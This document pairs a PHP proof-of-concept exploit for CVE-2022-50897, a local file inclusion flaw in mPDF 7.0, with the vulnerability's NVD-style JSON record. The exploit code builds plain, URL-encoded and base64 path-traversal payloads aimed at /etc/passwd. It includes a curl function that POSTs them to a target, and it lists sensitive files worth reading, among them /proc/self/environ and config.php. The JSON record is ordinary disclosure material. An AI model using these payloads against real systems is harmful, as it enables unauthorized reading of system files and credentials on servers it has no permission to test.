CVE-2022-50897

<?php // CVE-2022-50897 PoC - mPDF 7.0 Local File Inclusion // Target: mPDF 7.0 annotation file parameter manipulation // Method 1: Direct file path injection via annotation $poc_payload_1 = array( 'annotation' => array( 'file' => '../../../../../../etc/passwd', 'name' => 'malicious_file' ) ); // Method 2: URL-encoded payload $poc_payload_2 = array( 'annotation' => array( 'file' => urlencode('../../../../../../etc/passwd'), 'name' => urlencode('test.txt') ) ); // Method 3: Base64-encoded payload (if application accepts encoded input) $target_file = '/etc/passwd'; $poc_payload_3 = array( 'annotation' => array( 'file' => base64_encode($target_file), 'name' => 'encoded_file', 'encoding' => 'base64' ) ); // Example exploit request simulation function exploit_mpdf_lfi($target_url, $payload) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $target_url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($payload)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'Content-Type: application/json' )); $response = curl_exec($ch); curl_close($ch); return $response; } // Usage example // $result = exploit_mpdf_lfi('http://target.com/generate_pdf', $poc_payload_1); // echo $result; // Common targets for file inclusion: $target_files = array( '/etc/passwd', '/etc/hosts', '/var/www/html/config.php', '/etc/apache2/sites-enabled/000-default.conf', '/proc/self/environ', 'C:\\Windows\\System32\\drivers\\etc\\hosts' ); ?>

{"cve": {"id": "CVE-2022-50897", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:51.650", "lastModified": "2026-02-02T16:16:15.843", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "mPDF 7.0 contains a local file inclusion vulnerability that allows attackers to read arbitrary system files by manipulating annotation file parameters. Attackers can generate URL-encoded or base64 payloads to include local files through crafted annotation content with file path specifications."}, {"lang": "es", "value": "mPDF 7.0 contiene una vulnerabilidad de inclusión local de ficheros que permite a los atacantes leer ficheros del sistema arbitrarios manipulando los parámetros de los ficheros de anotación. Los atacantes pueden generar cargas útiles codificadas en URL o en base64 para incluir ficheros locales a través de contenido de anotación manipulado con especificaciones de ruta de fichero."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mpdf_project:mpdf:7.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "782B53A1-0F7A-493C-87B1-258072A4CA4D"}]}]}], "references": [{"url": "https://mpdf.github.io/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50995", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/mpdf-local-file-inclusion", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}